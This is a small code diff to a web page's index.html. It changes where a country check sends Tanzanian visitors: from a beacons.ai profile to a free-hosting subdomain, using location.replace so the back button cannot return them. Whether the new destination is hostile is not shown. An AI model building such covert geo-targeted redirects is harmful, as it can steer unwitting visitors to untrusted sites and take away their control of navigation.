--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
                     var data = JSON.parse(xhr.responseText);
                     if (data.country_code === 'TZ') {
                         // Use location.replace to prevent back button
-                        window.location.replace('https://beacons.ai/jojokamdoli');
+                        window.location.replace('https://biaza.great-site.net/?i=1');
                     }
                 } catch(e) {
                     // If error parsing, do nothing
